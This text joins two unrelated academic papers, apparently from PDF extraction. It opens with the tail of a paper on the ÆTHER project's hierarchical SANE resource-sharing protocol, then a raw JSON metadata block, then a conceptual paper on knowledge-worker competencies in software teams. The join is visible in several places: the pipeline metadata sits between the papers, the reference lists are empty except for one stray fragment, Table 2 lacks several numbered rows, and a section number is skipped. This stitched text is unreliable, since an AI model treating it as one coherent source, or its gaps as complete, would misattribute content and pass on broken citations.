**A unique root SANE.** The root SANE is the physical root of the cluster and is given responsibility for maintaining a complete picture of the capabilities of all SANEs that have announced themselves within the cluster. It also provides an interface to the next level of the hierarchy, which is called the environment in this paper. In this case, the implementation is trivial: at initialisation this SANE provides any joining SANE with its root SEP, which is then used as a target for all announce and request threads. The only problem with this implementation is that it relies on the root SANE being fault tolerant, as it is a single point of failure in the entire system. Note that if a single root SEP becomes overloaded, its resources can easily be partitioned and allocated to two root SANEs known by two subsets of SANEs.

**Every SANE is the root SEP.** Here, every SANE in the cluster receives announcements from all SANEs joining the cluster. In this case, on initialisation, each SANE must receive the SEP of all SANEs in the cluster and is responsible for announcing itself to all of them. Now it can broadcast its own requests to the cluster. This solution has maximum redundancy. Other solutions provide various forms of partitioning, e.g. peer-to-peer style approaches, where a particular SANE may know only of its immediate neighbours and where broadcast may proceed in multiple hops over subsets of the cluster.

6 Related work

The use of a distributed protocol for problem solving is not new. In 1980, Smith proposed the contract net protocol to specify distributed communication and control in a loosely coupled, problem-solving environment [7]. In this protocol, task distribution uses a negotiation process, where an exchange of messages between nodes in the system decides which tasks are to be executed and which nodes may be able to execute those tasks. This protocol (and other work within ÆTHER [8]) adopts a managed approach to work delegation, i.e. one node, the manager, assumes responsibility for monitoring the execution of a task and processing the results of its execution. In the approach described here, both execution and the responsibility for meeting any execution constraints are delegated. Although we adopt a market model here, the focus of this paper is the architecture and protocol. Moreover, the market is only required to provide variation around a cost based on energy, and it provides a distributed mechanism to detect and react to load. Further information on market-based resource allocation can be found in [14]. Mapping and scheduling workflows (sets of tasks with sometimes complex dependencies) onto grids, as in
GridFlow [9] and Nimrod-G [10], has similar requirements. There, a more pragmatic and coarse-grained approach is adopted, based on job submission, where communication between tasks uses files. These approaches typically use a cost/deadline resource-management model. More recently, e.g. [11] and [12], there has been a trend towards using a just-in-time approach: instead of analysing a workflow and trying to optimise a static schedule, resources are allocated on a first-come, first-served basis.

The work described here differs from grid developments in a number of significant ways. Perhaps the first and most significant is that the ÆTHER project aims to build a complete programming solution for such distributed environments and, in doing so, has defined a model of concurrency that captures both work and resources in an abstract manner in a single integrated model [4]. We also adopt a just-in-time approach to scheduling, but in our case this is required because the underlying SVP model is implemented at the level of instructions in a processor's ISA, and adaptations to load may occur at MHz rates, giving little time for planning a schedule. Also note that this just-in-time approach adapts to situations where there may be a significant latency in setting up a remote resource to perform a computation; two examples are just-in-time compilation for different instruction sets and device configuration in FPGA-like devices. In ÆTHER there is considerable interest in the design of run-time support for reconfigurable SoCs [13].

7 Summary

This paper has presented the architecture of a hierarchical SANE system, where resources are shared between SANEs by delegating both work and the responsibility to meet the deadlines or requirements for that work. This architecture builds upon the SVP model of concurrency, which provides an abstraction of work as a family of threads and an abstraction of resources as a place. The protocol provides a place server to define the place at which the family of threads is executed once the protocol has been completed.

The protocol proposed for negotiating the use of resources is based on a cost model that uses the required energy as a baseline cost, to be modulated by market forces. A baseline implementation could use cost simply as a selection criterion, with no credits being exchanged at all; in this way threads could collectively minimise energy consumption in the system. With a cost model, however, much richer scenarios can be envisioned, where the cost, although based on energy, is dependent on market conditions, such that in periods of high demand the cost would rise. In such a scenario one can imagine, as in our financial world, a number of SANEs cornering the market on energy credits by speculating in the market. Such cost policies and mapping strategies will be evaluated within the remaining period of the ÆTHER project in order to understand their emergent behaviour.

8 Acknowledgements

The authors acknowledge support from the European Community in funding the research undertaken in the ÆTHER project.

References
{"Source-Url": "https://pure.uva.nl/ws/files/4266453/59494_293368.pdf", "len_cl100k_base": 5556, "olmocr-version": "0.1.48", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 25792, "total-output-tokens": 7036, "length": "2e12", "weborganizer": {"__label__adult": 0.0004298686981201172, "__label__art_design": 0.0008325576782226562, "__label__crime_law": 0.0004458427429199219, "__label__education_jobs": 0.000965118408203125, "__label__entertainment": 0.0001398324966430664, "__label__fashion_beauty": 0.0002341270446777344, "__label__finance_business": 0.0004622936248779297, "__label__food_dining": 0.000492095947265625, "__label__games": 0.000705718994140625, "__label__hardware": 0.005313873291015625, "__label__health": 0.0009794235229492188, "__label__history": 0.000530242919921875, "__label__home_hobbies": 0.00020563602447509768, "__label__industrial": 0.00106048583984375, "__label__literature": 0.0003757476806640625, "__label__politics": 0.0003943443298339844, "__label__religion": 0.0007481575012207031, "__label__science_tech": 0.464599609375, "__label__social_life": 0.000102996826171875, "__label__software": 0.00872802734375, "__label__software_dev": 0.51025390625, "__label__sports_fitness": 0.0004074573516845703, "__label__transportation": 0.001495361328125, "__label__travel": 0.0002837181091308594}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 30489, 0.02523]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 30489, 0.5528]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 30489, 0.92025]], "google_gemma-3-12b-it_contains_pii": [[0, 1499, false], [1499, 3830, null], [3830, 6065, null], [6065, 9166, null], [9166, 11456, null], [11456, 14630, null], [14630, 17373, null], [17373, 19385, null], [19385, 21656, null], [21656, 24640, null], [24640, 27678, null], [27678, 30489, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1499, true], [1499, 3830, null], [3830, 6065, null], [6065, 9166, null], [9166, 11456, null], [11456, 14630, null], [14630, 17373, null], [17373, 19385, null], [19385, 21656, null], [21656, 24640, null], [24640, 27678, null], [27678, 30489, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 30489, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 30489, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 30489, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 30489, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 30489, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 30489, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 30489, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 30489, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 30489, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 30489, null]], "pdf_page_numbers": [[0, 1499, 1], [1499, 3830, 2], [3830, 6065, 3], [6065, 9166, 4], [9166, 11456, 5], [11456, 14630, 6], [14630, 17373, 7], [17373, 19385, 8], [19385, 21656, 9], [21656, 24640, 10], [24640, 27678, 11], [27678, 30489, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 30489, 0.0]]}
olmocr_science_pdfs
2024-11-26
2024-11-26
8b7f3f525e5fc8ecacea575f6e4bd974c99e41aa
Harnessing a Knowledge Worker's Competency: Lessons from the Software Development Teams

Manasi Shukla, PhD Office, Nanyang Business School, S3-01B-73, Nanyang Technological University, Nanyang Avenue, Singapore 639798. Email: somu@pmail.ntu.edu.sg

Professor Vijay Sethi, Dean (Business), Nanyang Business School, S3-01A-21, Nanyang Technological University, Nanyang Avenue, Singapore 639798. Email: avsethi@ntu.edu.sg

ABSTRACT

In this conceptual paper, we propose that the work force can no longer be understood only as a factor of production, but must be projected as a strategic core competency of any organization. The "knowledge-based", post-industrial economy has led to a higher degree of pressure on corporations to nurture and enhance their key strategic resource, viz. the knowledge worker (K-worker). Based on the resource-based view and firm strategy, we define the core human competency of the K-worker as a firm-specific, rent-generating resource manifested in the behavior pattern of its employees that is aligned with a firm's core business activities. Our literature survey of the software developer's field suggests the key business imperatives of future orientation, customer orientation, teamwork, problem resolution, and quality; hence, these five are hypothesized as the key human competency determinants of a software developer, a typical K-worker. Our novel approach thus presupposes that human competency grows with and around the key business activities of a business organization. The utility of this approach is projected through the lens of the systems view, via the fifth discipline, and is integrated with quality management practices to build a bulwark for the nurturing of human core competencies. At the heart of this systemic thinking is a shift of mind, better termed "metanoia". We thus emphasize that K-worker management needs a more individualized and customized appreciation, unlike what has been the norm so far. This strategic human competency approach is then the crucial ground for a learning-enabled organization of the future, struggling under the enormous pressure of competition in today's landscape.

KEY WORDS

Competencies, Knowledge Workers, Software Development Team Professionals, Systems View.

1.0 INTRODUCTION

The employee as a knowledge worker is increasingly recognized in the IT industry, and this has been an emerging area of research in the Information Systems literature (Davis, 1999). Before proceeding any further, we need to address what an "IT worker" is as a key artifact of the knowledge-work era. An IT worker is an organizational employee responsible for designing, building, testing, maintaining, and operating organizational applications and infrastructure. Such IT workers are characterized by high turnover rates, as they are being wooed away by the private sector in droves, resulting in fierce marketplace competition for staff. In general, our global, knowledge-based, postindustrial economy is made up of knowledge organizations that have migrated from a job-description-based, task-oriented workforce to one in which knowledge workers occupy broader roles that may change over time as projects change, evolve, and develop. The rapidity of technology change demands different skills from employees than ever before. In such a context, the determination of relevant competencies becomes critical to the success of tomorrow's knowledge workers in knowledge-intensive organizations.
Besides, it is crucial to understand the engineering of individual consciousness shifts needed to make such a competency initiative work for these knowledge workers. Much of the support for knowledge-work productivity consists of enabling technology, enabling methods and procedures, and an organization culture that transmits "how things are done". Interestingly, there is little or no research distinguishing the competence-led strategies of the more productive workers.

Although competency theories are scarce, there is ample evidence in the literature of attempts to explain the term "competency." A review of the competency literature reveals two approaches to defining the term. Boyatzis headed a research effort in the 1970s, initiated by the American Management Association, to find out what makes managers competent. This approach led him to believe that "competencies" is a general term for the skills that are, and can be, deployed by managers to accomplish their assigned jobs; these skills are best learned through practice on the job. Boyatzis (1982) built on this research in his classic model, an adaptation of the classical psychological model of behavior, according to which behavior is determined by the person and the environment. Both gurus of human core competency define it as an "underlying characteristic causally related to superior performance in resonance with its environment". The other approach was based on a study by the UK Government Employment Department asserting that the term "competency" has a wider implication than just the attributes of jobholders. Instead, this approach identifies the outcomes expected from a job when it is performed adequately. It suggests not only skills and knowledge but also the range of qualities of personal effectiveness needed to get the job done. In keeping with this second view, McClelland (1985) first broached the topic of superior performance by individuals at a specific job. This he attributed to "competencies", by which people in any organization can be evaluated and assessed to predict their performance. The literature also presents a wide array of studies on the individual competencies needed to perform a given job effectively. Spencer et al. (1993) define competency as an underlying characteristic of an individual, causally related to criterion-referenced effective and/or superior performance in a job. Further, William Rothwell (1989), a leading practitioner of competency and competency-mapping techniques, describes competencies as the internal capabilities that people bring to their jobs.

The above authors define competencies only as a subset of employee competence at work. Moreover, their definitions lack the visible-behavior aspect of an employee that we wish to study and define. We will instead explain competency as a dynamic behavioral pattern: a set of activities that an individual performs to stay effective in the given context of his or her job in an organization. At this stage it is worth mentioning that competencies have also been characterized as sets of behavior patterns, but these characterizations have yet to incorporate a strategic orientation. For example, the behavioral perspective has led writers and firms to compile profiles of generic competencies and to relate these to performance (Spencer and Spencer, 1993).
The compilation of a set of personal characteristics or competencies has been criticized in the aforementioned literature, and we set about moving beyond the concept of competencies to the firm's core competitiveness, the "roots of competitiveness" (Prahalad and Hamel, 1990). This facilitates the combination of strategic and behavioral competencies, which Sparrow (1994) contends is the most appropriate competency approach. Grant (1991) observes that the rationale for basing the firm's long-term strategy on its resources and capabilities rests on the premise that resources and capabilities provide the basic direction for the firm's strategy, and that they are the primary source of profit for the firm. Hence, we can argue that to the extent that human resources are at the heart of organizational processes, they are a potential root of competitiveness. Also significant is the contribution of Nordhaug and Gronhaug (1994), who likewise see human competency as a critical resource for competitiveness, especially where competencies are treated as a portfolio configured with regard to a firm's value activities. Thus, the significance of analytical and cognitive abilities and interpersonal and social skills derives from their association with the core services and activities. In practice, this means that managers should be able to relate behavioral profiling not merely to the job but to the core business activity. The advantage afforded by the more successful employees' competencies can then be replicated throughout a business: one manager will be more successful in a certain role than his or her peers because his or her set of competencies is more suited to the functions required in that position. Human competency is thus an aspect of business by which we define what we can do best. It is a core capability that is dynamic and cannot easily be imitated, as it is a function of dynamic learning processes and the continual practice that feeds it.

3.0 THE STRATEGIC HUMAN COMPETENCE FRAMEWORK

Human resource management theorists applying resource-based lenses have highlighted the advantage-producing traits of human capital (Castanias and Helfat, 1991); e.g., top management expertise has been described as a rent-generating firm resource. In contrast to generic skills, which are easily transferable between uses, industry-related and firm-specific managerial skills may generate quasi-rents. Both, however, may produce Ricardian rents because they are scarce and difficult to duplicate perfectly. No matter how much one understands about the mental processes, structures, and representations that underlie cognitive performance, intelligence cannot be fully grasped unless one understands how it is applied in the everyday world (Warr and Conner, 1992). A theory of intelligence must ultimately reflect the capability of emitting contextually appropriate behavior, which includes the utilization of tacit knowledge (Sternberg, 1985). Therefore, the rent-generating features of intelligence cannot be assessed in terms of psychometric scores that measure problem-solving and verbal abilities alone; they must also be assessed in terms of practical competencies. These also reflect tacit or intangible knowledge, which is not easily duplicated or substituted (Hall, 1993; Reed and DeFillippi, 1990).
Also, practitioners of intelligence research have highlighted the argument that traits like intelligence are fundamentally irrelevant for determining individual differences in acquired expertise (e.g., Ericsson et al., 1993). To explain sustained competitive advantage and supernormal profits, the resource-based view (RBV) focuses on the characteristics of three types of resources, viz. physical capital, human capital, and organizational capital. These three types of capital form the mainstay of strategy and RBV-related theory. We focus on the last two resources in studying human competence at work. This implies that the static human resource of skills and knowledge changes in compliance with organizational routines; the result is closely aligned with the firm's business activities. Thus, we may point out that the rent-generating feature of resources is manifested in the K-worker's strategic competency.

3.1 Competency of a K-Worker Defined

Hence, we define human competency as follows: a firm-specific, rent-generating, critical resource manifested in the behavior pattern of a firm's employees that is aligned with the firm's core business activities. Having arrived at a workable definition, we now present a research gap in K-worker studies in the information systems (IS) discipline. Studies of K-workers in the IS discipline have focused on skills as a static component, largely in the form of organizational and technical skills alone; the exception is the Trauth et al. (1993) article, which considers an additional requisite of a K-worker in the given context.

4.0 LITERATURE REVIEW OF K-WORKERS IN INFORMATION SYSTEMS

In the past, several studies have focused on the knowledge and skill requirements of IS personnel (Baroudi, 1985; Bryant, 1975; Cheney, 1988; Cox and Snyder, 1985). This research drives home the point that the generic requirements of IS professionals need continual refinement, as they change with time (Baroudi, 1985; Cheney, 1988). Studies conducted in the 1980s indicated a growing need for IS personnel to have functional expertise (Cheney, 1988), so that they may freely consult the end-users too. The recent spate of research on the skills of IS professionals tends to focus on soft skills, irrespective of the total skill versus competence set required (Lee, Trauth & Farwell, 1995; Nelson, 1991; Todd, McKeen & Gallupe, 1995; Trauth, Farwell & Lee, 1993; Wade & Parent, 2002). It can be inferred (Table 1) that the area of human competencies has gone unresearched so far, owing to the focus on IS professionals' knowledge and skills alone. Moreover, specific studies have been done on the skills of web designers and webmasters (e.g. Sgobbi, 2002; Wade & Parent, 2002), but so far no research has been done on the core competencies of a systems professional in the context of the now-ubiquitous software development team. Also, most of the works discussed so far have captured (refer to Table 1) IS professionals' knowledge and skills in the form of organizational and technical skills alone; the exception, as noted, is Trauth et al. (1993), which adds a human-ability component to the skills profiling. These studies treat skills as a static resource, independent of the organization in which the K-worker is deployed.
This then forms the crux of our competence framework, wherein we attempt to highlight application-based K-worker competencies.

4.1 Core activities in the software industry/teams

This is the first initiative to construct a workable measure of the key competency areas of software development professionals operating in a team environment. In a novel approach to this knowledge-based search for individual competencies, we provide the key strategic business-activity dimensions as identified in the literature; this forms the basis for the present study. The literature on software organizations reveals a few core business imperatives around which these organizations flourish. Based on our analysis of the literature so far, we hereby propose a framework for understanding what it takes to convert a skill set, as a resource, into a dynamic human competence capability aligned with the business imperatives of the software development industry. We thus establish the key competence areas of these firms that enable their human resources to align their competences around these core business activities. The following are the definitions of the five highlighted business-led core human competency areas.

4.1.1 Futuristic Orientation Competency

This refers to the business processes of the software development team that require its K-workers to learn new technologies, languages, and the like. To this end, software firms initiate collaborations with corporations such as Microsoft, Oracle, and Novell to train their K-workers/engineers on future technologies. Besides, with outsourcing projects on the upswing, K-workers are trained to be multilingual, with multicultural awareness for probable future projects. Thus, these firms have built-in system features that prepare their programmers, or K-workers, to develop futuristic-orientation competencies.

4.1.2 Problem Resolution Competency

The software developer's world is forever fraught with complex situations. These could relate to resolving systems analysis and design issues, deciphering the right code, or finding the right fit between the complexity of the output and its multiplicative features. This entails debugging, troubleshooting, and similar resolutions. Sometimes issues in a customer solution crop up post-implementation, requiring the know-how of the original code authors, who might by then have been assigned different duties; this implies the problem of getting across to them and resolving the pending customer issues. Further, customers may present critical issues from time to time, requiring attention.
Table 1: Recent Research on IS Developers' Profiles

<table>
<thead>
<tr>
<th>Recent Studies on IS/K-Worker</th>
<th>Construct Studied</th>
<th>Sub-dimensions of the Construct</th>
<th>Methods</th>
<th>Sample Unit</th>
<th>Key Findings</th>
</tr>
</thead>
<tbody>
<tr>
<td>Wade and Parent, 2002</td>
<td>Skills</td>
<td>Technical (Development)</td>
<td>Job-content analysis and survey</td>
<td>Webmasters</td>
<td>Empirical link between job skills and job performance</td>
</tr>
<tr>
<td>Lee, Trauth and Farwell, 1995</td>
<td>Knowledge and skills</td>
<td>Business &amp; interpersonal</td>
<td>Focus groups and Delphi surveys</td>
<td>IS and user managers</td>
<td>Requirement for IS professionals with both technical and organizational skills</td>
</tr>
<tr>
<td>Todd, McKeen and Gallupe, 1995</td>
<td>Skills</td>
<td>Technical (Development)</td>
<td>Job-content analysis</td>
<td>Systems analysts and IS managers</td>
<td>Systems analysts' job requirements show maximum transition, with increasing requirement of technical knowledge</td>
</tr>
<tr>
<td>Trauth, Farwell and Lee, 1993</td>
<td>Skills</td>
<td>Business (Business abilities)</td>
<td>Brainstorming sessions, telephone interviews and focus groups</td>
<td>IS managers, end-user managers, and IS professors</td>
<td>An expectation gap discovered between industry needs and academic preparation of the future IS professional</td>
</tr>
<tr>
<td>Nelson, 1991</td>
<td>Knowledge and skills</td>
<td>General IS (Knowledge, IS product and technical)</td>
<td>Focus groups and survey</td>
<td>IS and end-user personnel</td>
<td>IS personnel need more organizational knowledge; end-users require more IS-related skills</td>
</tr>
</tbody>
</table>

Addressing such issues implies knowing the organizational structure, its hierarchy, and the facilitating persons for a particular issue in the network. Thus, all these facets of a fast-paced knowledge organization develop the problem-resolution competency of a K-worker.

4.1.3 Quality Approach Competency

The software industry is crowned with a host of quality-related accreditations and awards whose standards need to be adhered to. This instills in K-workers the ethic of quality work. Moreover, it implies precision in code writing, the minimization of bugs in code, and the like. The real-time incorporation of dynamic code requirements from the customer's vantage point is another example of the quality work ethic. From these examples we may see how the quality competency becomes incorporated in the profile of a K-worker.

4.1.4 Group Orientation Competency

Work in the knowledge era is more group-oriented, i.e. there is more dependence on work groups and teams to get jobs accomplished. The software development team is an example of such a work culture. Thus, much attention is paid to peer-to-peer networking, conflict resolution mechanisms, delegation, negotiation, and other group mechanisms. This makes K-workers resolute in working cooperatively in large and small teams, instilling in them what is termed the group-orientation competency.

4.1.5 Customer Orientation Competency

Last but not least, as is well known, is the care of customers. Knowledge work in the fast-paced software industry is increasingly client-focused. This may require working even on weekends or public holidays if that is what the client requires. For a K-worker this means showing initiative, enthusiasm, and motivation in serving the customer.
The K-worker needs to have domain knowledge and corporate know-how of the client to stay on top of any critical situation. Thus, K-workers are called on to add value to the custom-tailored solution for each customer. This instills in them the key competency of customer orientation.

Hence, the above are the key competency areas for a software programmer, a typical example of the twenty-first-century K-worker. These key activities are summarized as the core competence areas of these organizations (refer to Table 2). We can thereby utilize this knowledge to develop frames for understanding individual competency levels on each of the above dimensions. Then we may enhance the K-worker's competency and bridge competency gaps based on the following insights from Peter Senge's Fifth Discipline (1990). The following is a prescriptive section for human resource practitioners in the K-era.

5.0 MANAGING THE K-WORKER'S COMPETENCY: A SYSTEMATIC APPLICATION OF THE FIFTH DISCIPLINE

The characteristics of organizational systems, which include complexity, internal dynamics, and intransparence, ensure incomplete or incorrect understanding of the system. As people perform, they create performance systems, which can be seen as the outputs of their competency measures. These then present constraints on, and opportunities for, future choices. It can be noted that people, as dynamic entities, continuously create evolving performance and competency gaps. Besides, the intransparence of organizational systems, caused by system complexity and internal dynamics, results in a lack of clarity about performance-improvement situations. This implies an incorrect understanding of the system in which an individual may plan, decide, and take action to fulfill his or her own and the team's aspirations. Today, learning organizations are those where people continually expand their capacity to create the results they truly desire, where new and expansive patterns of thinking are nurtured, where collective aspiration is set free, and where people are continually learning how to learn together (Senge, 1990). The distinguishing feature of a learning, knowledge-oriented organization is the art of converging the five disciplines of systems thinking, personal mastery, mental models, building shared vision, and team learning. We therefore propose to view the competencies of the workforce through the lens of Senge's five disciplines. The five disciplines form an ensemble and are mutually dependent.

5.1 Personal mastery

The first discipline, personal mastery, is foundational: without it, no real understanding of an employee is possible. Personal mastery's spiritual foundations lie in continually clarifying and deepening our personal vision, values, and objectivity. To tap the reservoir of employee creativity, personal mastery starts with clarifying the things that really matter to employees in the workplace. In order to serve their highest aspirations, the members of software development teams (SDTs) need to be aware of the relevant benchmarks, i.e. what works best. This is where a competency profile of the software professional would shed light on the trends in this much-sought-after profession and guide the professional development of each and every employee in an SDT.
This extends the research into the software professional's skill field (Lee, Trauth & Farwell, 1995), as it moves beyond acknowledging valuable human resources to setting standards for effectively harnessing them. It would then form the basis for any employee development program, presenting a more genuine and comprehensive picture of systems development professionals.

Table 2: The Five Key Business Activities of the Software Organization

<table>
<thead>
<tr>
<th>Sr. No.</th>
<th>Topics covered</th>
<th>Cited Literature</th>
<th>Key Business Activity</th>
</tr>
</thead>
<tbody>
<tr>
<td>1.</td>
<td>Quality processes, viz. documentation, SEI-CMM level 5, PCMM level 5 optimization, etc.</td>
<td>Boehm and Egyed (1999); Meredith (1985); Robinson and Ringer (1999); Tomek and Giles (1999)</td>
<td>Quality Approach</td>
</tr>
<tr>
<td>2.</td>
<td>Conflict management and buffers to social interactions</td>
<td>Gobeli, Koenig &amp; Bechinger (1998); Sawyer (2001); Sawyer, Farber and Spillers (1997); Sussman and Guinan (1999); Zachary (1998)</td>
<td>Group Orientation</td>
</tr>
<tr>
<td>6.</td>
<td>Packaged software vs. in-house development teams</td>
<td>Carmel and Sawyer (1998)</td>
<td>Group Orientation</td>
</tr>
<tr>
<td>8.</td>
<td>Project management skills and related variables</td>
<td>Ball (1985); Boehm and Ross (1989); Carragher (1985); Sweet (1985); Taft, Borchering and Hudgins (1991)</td>
<td>Future Orientation, Quality, Customer Orientation, Problem Resolution and Group Orientation</td>
</tr>
<tr>
<td>10.</td>
<td>Effective time and project deadline management</td>
<td>Blackburn and Scudder (1996); Meilir (1985)</td>
<td>Quality Approach and Problem Resolution</td>
</tr>
</tbody>
</table>

5.2 Mental Models

We proceed to the second discipline, that of mental models, which are instrumental in effecting human behavior. It is concerned with an individual's insight into his or her "self", which may be enabled only through openness to inquiry and learning. Again, from the perspective of the software industry, this is not far from the truth, as people learn to manage themselves all the time. Still, certain organizational interventions, such as assessment centers and training and development, can be crafted to enable an individual's growth and learning. The effort should lead to intrinsic upliftment, fulfilling self-awareness and self-actualization needs. An example could be training interventions directed towards raising individual as well as collective consciousness, such as transcendental meditation techniques. Moreover, proponents of the transcendental approach consider quality and high competence as synonymous with "innate excellence". Such interventions have reportedly been applied in some key organizations and industries across Europe and the United States; global K-workers can benefit from this intervention too, once it is rightfully conceptualized and administered. Thus, to make organizational changes and practices meaningful for each employee, it becomes necessary to engage their tacit mental models as a useful tool.

5.3 Shared Vision

The third discipline concerns itself chiefly with the building of a shared vision. All successful organizations deeply share their goals, values, and missions with their employees. What would then be required is a shared vision of the commonalities in the software developer community by virtue of their competency goals.
This would help bind them together through a common identity and destiny, despite their indisputably different selves and orientations. This practice of sharing competency measures would involve the skill of building mentally shared "pictures of the future". This, in turn, fosters genuine commitment and enrollment rather than the dictates of compliance.

5.4 Team Learning

The fourth discipline is team learning, which in turn abets organizational learning. This is not possible in the absence of shared vision and goals. All organizational members learn to respect and internalize the common competency goals of the group. Noteworthy is the fact that the resulting capacity and intelligence of the team would be far greater than the total of its individuals'.

5.5 Systems Thinking

Systems thinking, the last of the five disciplines, considers business and other human endeavors as systems (Senge, 1990). We as human beings are apt to focus on snapshots of isolated parts of a system. In the process, we may fail to take cognizance of the entirety and reality of a situation, which results in a parochial view of any crisis. Hence, the solution lies in systems thinking, by which we mean a conceptual framework that makes patterns and events clearer. This enables us to influence reality so as to bring about the requisite change. Taking the instance of K-work in software development teams, it is often recorded that personnel are subjected to ubiquitous job-related training programs that are generic in nature. The need is to treat each employee as an entity embedded in the environmental system of the organization, with a specific mental model, and to produce "metanoia", or the shift of mind, in employees, resulting in enhanced competency via the above-mentioned techniques. This is pertinent since systems thinking regards every employee as a distinct stakeholder in the organization, which certainly implies that each K-worker differs in his or her training and developmental needs. This view is supported by the resource-based view (Barney, 1991), which values each employee as a potential resource base that needs individual nurturing rather than being considered another faceless cog in the wheel. All the above-mentioned disciplines enmesh to provide significant competency-led team learning, resulting in smoother coordination and cooperation within these sub-groups (refer to Figure 1). Thus, we make a significant contribution to the much-needed research on the quality of K-workers in a K-organization such as a software development team.

6.0 IMPLICATIONS

The critical perspective of the social constructivist approach considers quality as being constructed through the accounts provided by various powerful agents, i.e. a product or professional is held to be of quality not because it is inherently good, but because it has been adjudged good by those in a position to bestow or recognize quality, viz. the customers, top management, a standards certification body, etc. (Kelemen, 2003). This approach justifies the rationale for focusing on the much-acclaimed competence of professionals in competent and successful organizations in the software development industry. The management of human resources via these core competencies impacts competitive advantage in firms through its role in determining the skills and motivations of employees and the cost of hiring and training them.
With the software development industry being crowned with a host of quality certifications and awards at the organizational and customer satisfaction levels, it becomes necessary to view it through a third eye: the eye of its professionals' quality. Noteworthy is the finding that almost two-thirds of organizational value is perceived to be intellectual, and that half of this intellectual capital (IC) value is perceived to come from the people dimension. Still, theories of IC management in this sense are scarce. Filling these gaps in knowledge therefore requires the development of mid-range theories: theories for which general frameworks are available but which lack domain-specific operationalizations. Moreover, it has been noted that aligning human resource practices with the philosophy of quality requires significant changes in the way an organization trains, empowers, evaluates and rewards individuals and teams. Most quality programs rely on Human Resource policies to encourage employees to embrace both standardized and continuous-improvement tasks so as to generate employee commitment. Interestingly, the need for employee commitment and involvement in the goal of quality has not been explicit in the work of the quality gurus. For instance, Deming's quality philosophy focused only on the changes management has to make, and Juran's quality ethics mentioned employee involvement only superficially. A study of quality award winners in America (e.g. Xerox, Motorola) suggests that the integration of Human Resource Management and quality management practices in these companies has apparently led to reduced costs, increased product reliability, greater customer satisfaction and shorter product life-cycles. The requirements of software process maturity models such as the Capability Maturity Model (CMM) are unique in that they show that information systems professionals working in large teams must be capable of being highly productive, with a strong emphasis on process control and overall quality. The quality practice of continuous improvement, when applied to HR, relies on the generation of objective data, facts that are perceived as true and can be used to promote and systematically improve people's work processes. In the software industry, people management practices, although significantly studied, do not address people issues in a systematic and structured manner. Hence, this study brings attention to human resources with a focus on the competencies of K-workers in the software industry. 7.0 FUTURE RESEARCH DIRECTIONS This study can be designed as a precursor to a more empirically driven formulation of the core competencies of a K-worker in a software development environment or in another K-worker arena. Further, we may develop a cross-cultural understanding of the variations in the profiling of a K-worker's competencies. Besides, K-worker management needs to reach new, improved heights through the application of the systems view outlined in this study. An empirical validation of this framework in the real world via a case study approach would strengthen it further. Thus, strategic human resource management would benefit tremendously from this study in an era of businesses outgrowing national boundaries. 8.0 REFERENCES process integration. Computer Standards and Interfaces. 21(1): 63-75.
{"Source-Url": "https://core.ac.uk/download/pdf/42981034.pdf", "len_cl100k_base": 6675, "olmocr-version": "0.1.53", "pdf-total-pages": 10, "total-fallback-pages": 0, "total-input-tokens": 33018, "total-output-tokens": 10848, "length": "2e12", "weborganizer": {"__label__adult": 0.001007080078125, "__label__art_design": 0.0013828277587890625, "__label__crime_law": 0.0009012222290039062, "__label__education_jobs": 0.1263427734375, "__label__entertainment": 0.00027632713317871094, "__label__fashion_beauty": 0.000499725341796875, "__label__finance_business": 0.040435791015625, "__label__food_dining": 0.001308441162109375, "__label__games": 0.0012598037719726562, "__label__hardware": 0.0009222030639648438, "__label__health": 0.0017604827880859375, "__label__history": 0.0006017684936523438, "__label__home_hobbies": 0.0004048347473144531, "__label__industrial": 0.001384735107421875, "__label__literature": 0.0014505386352539062, "__label__politics": 0.0009908676147460938, "__label__religion": 0.000888824462890625, "__label__science_tech": 0.0244903564453125, "__label__social_life": 0.0008106231689453125, "__label__software": 0.01351165771484375, "__label__software_dev": 0.77685546875, "__label__sports_fitness": 0.0008025169372558594, "__label__transportation": 0.0011682510375976562, "__label__travel": 0.0006532669067382812}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 46398, 0.05782]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 46398, 0.20431]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 46398, 0.90942]], "google_gemma-3-12b-it_contains_pii": [[0, 3960, false], [3960, 9628, null], [9628, 14963, null], [14963, 17997, null], [17997, 23554, null], [23554, 28660, null], [28660, 31654, null], [31654, 37260, null], [37260, 42164, null], [42164, 46398, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3960, true], [3960, 9628, null], [9628, 14963, null], [14963, 17997, null], [17997, 23554, null], [23554, 28660, null], [28660, 31654, null], [31654, 37260, null], [37260, 42164, null], [42164, 46398, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 46398, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 46398, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 46398, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 46398, null]], 